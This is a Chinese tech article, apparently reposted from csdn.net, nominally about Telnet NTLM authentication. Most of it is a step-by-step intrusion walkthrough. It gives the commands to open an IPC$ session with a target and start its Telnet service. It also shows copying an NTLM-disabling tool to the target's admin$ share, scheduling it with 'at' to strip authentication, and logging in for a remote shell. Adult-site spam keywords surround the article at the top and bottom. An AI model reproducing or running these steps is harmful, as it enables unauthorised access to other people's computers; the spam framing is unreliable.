成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Telnet身份驗證體系的分析

網絡 網絡管理
文章摘要:作為非常著名的Telnet協議,我們通常都會擔心它的安全。那么微軟也對Telnet的安全實施進行了改善,這里介紹的就是Telnet身份驗證。

Telnet身份驗證也就是NTLM驗證,是微軟為了保證Telnet登錄安全的一個驗證體系。那么這個功能如何實現呢?這里我們就來詳細介紹一下。由于Telnet功能太強大,而且也是入侵者使用最頻繁的登錄手段之一,因此微軟公司添加了Telnet身份驗證系統,稱為NTLM驗證,它要求Telnet終端除了需要有Telnet服務主機的用戶名和密碼外,還需要滿足NTLM驗證關系.NTLM驗證大大增強了Telnet主機的安全性,就像一只攔路虎把很多入侵者拒之門外.(關于NTLM我有寫一個專門帖子.各位可以去看看)

Telnet身份驗證1.使用Telnet連接主機

指令格式(cmd):Telnet 192.168.0.0 連接端口號

如果要斷開.就是exit.

Telnet身份驗證2.典型Telnet入侵攻略

第一步:建立IPC$連接

第二步:開啟遠程Telnet連接,首先在cmd(確定此時的根目錄是目標的)輸入指令.service  開啟service項目.仔細找找.就有Telnet服務項.把它打開.

第三步:取消IPC$連接:net use 192.168.0.0 /del

第四步:去掉NTLM驗證,如果沒有去除目標上的NTLM驗證,在登錄目標的電腦的時候就會失敗.

其實方法有很多種.就介紹最常用的一個.也是最簡單的方法吧.

首先,在本地計算機上建立一個與遠程主機上相同的賬號和密碼.

指令:net localgroup alpha /add不過確定對方的賬號也是alpha.因為要相同的.

第二步:通過"開始"→"程序"→"附件"找到"命令提示符",使用鼠標右鍵單擊"命令提示符",然后選擇"屬性".

在"以其他用戶身份運行(U)"前面挑上挑.然后點."確定"接著.仍然按照上述路徑找到"命令提示符"(cmd).之后用左健打開它.

之后寫上用戶名和密碼.alpha的

然后點確定.得到cmd shell框.

之后輸入我們的指令:Telnet 192.168.0.0

現在就會顯示一個更新后的cmd shell.這個shell就192.168.0.0上的.

其實去掉Telnet身份驗證的方法很多.再介紹給大家一個方法.

這個方法就是超級菜鳥話.因為我們需要用到一個工具.NTLM.exe.這個工具就像是3389.exe一樣.只要把3389.exe傳到一臺機器上去執行.那臺機器上的3389端口就會自動打開.

NTLM.exe的運作概念和3389.exe是一樣的.我們需要做的就是把我們的NTLM.exe傳到192.168.0.0這個機器上.

首先:開cmd.

然后輸入指令:net use \\192.168.0.0\ipc$*""\user:administrator

之后再輸入指令:copy c:\NTLM.exe \\192.168.0.0\admin$

解釋一下:\admin$是使用192.168.0.0主機上的admin用戶共享權限.

然后再輸入察看時間指令:net time \\192.168.0.0

我們假如對方的時間是2007/9/21 下午3點21分.

之后再輸入執行指令:at \\192.168.0.0 15:22 NTLM.exe

解釋一下:15:22是24小時至的下午3點22分.cmd shell輸入指令時一定要寫24小時的.

之后當按回車確定后得到:新增加一項作業    
或者是什么指令成功完成的提示字后.等待1分鐘.讓cmd完成我們的shell command.

之后我們再輸入指令:Telnet 192.168.0.0

Ok.大功告成.

如果要恢復Telnet身份驗證.我們要用到一個shell工具:resumeTelnet.exe

resumeTelnet.exe使用的方法是這樣的.

命令格式:ResumeTelnet.exe \\\\server name password

其中server name是主機域名或者是IP都可以.我們就寫192.168.0.0

password當然就是密碼了.

回車確定.當顯示the command completed successfully后.一切完成.

責任編輯:佟健 來源: csdn.net
相關推薦

2010-07-19 17:30:47

2010-09-06 11:24:47

CHAP驗證PPP身份驗證

2025-04-25 07:00:00

身份驗證CISO無密碼

2012-04-10 09:36:58

2011-02-21 10:54:45

2013-07-21 18:32:13

iOS開發ASIHTTPRequ

2012-10-23 16:12:35

2009-04-09 23:44:08

軟件身份驗證用戶

2022-10-31 10:00:00

2010-11-30 15:31:38

SharePoint Kerberos

2021-07-19 10:10:15

身份驗證漏洞Windows Hel

2010-11-03 16:07:38

DB2身份驗證

2012-02-20 09:55:41

ibmdw

2021-08-27 10:40:49

GitHubGitLinux

2025-01-14 08:13:11

2011-05-23 10:37:03

2010-10-22 14:59:22

2011-05-10 09:09:36

身份驗證HID Global

2015-01-28 10:00:49

2024-02-02 08:56:54

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲视频免费观看 | 亚洲一区二区视频 | 免费在线观看成年人视频 | 国产精品一区二区久久久久 | 国产精品夜间视频香蕉 | 一级黄色片一级黄色片 | 天天插天天操 | 男人天堂国产 | 亚洲国产成人精品女人久久久 | 一区二区精品 | 国内精品视频 | 男女免费在线观看视频 | 亚洲国产看片 | 美女福利网站 | 欧美精品一区二区免费 | 欧美白人做受xxxx视频 | 99精品一区二区三区 | 成人精品免费视频 | 国产成人在线视频 | 国产区精品 | 一区二区在线免费观看 | 自拍偷拍中文字幕 | 日韩在线免费视频 | 视频一区二区中文字幕 | 81精品国产乱码久久久久久 | 伊色综合久久之综合久久 | 中文字幕一区在线 | 99免费视频 | 午夜视频在线观看视频 | 欧美综合一区二区 | 在线观看成人小视频 | 精品一区av| 日本五月婷婷 | 一区二区三区视频在线观看 | 日韩精品四区 | 欧美日韩一区精品 | 亚洲电影免费 | 久久久久久国产免费视网址 | 欧美二区在线 | 欧美福利一区 | 欧美小视频在线观看 |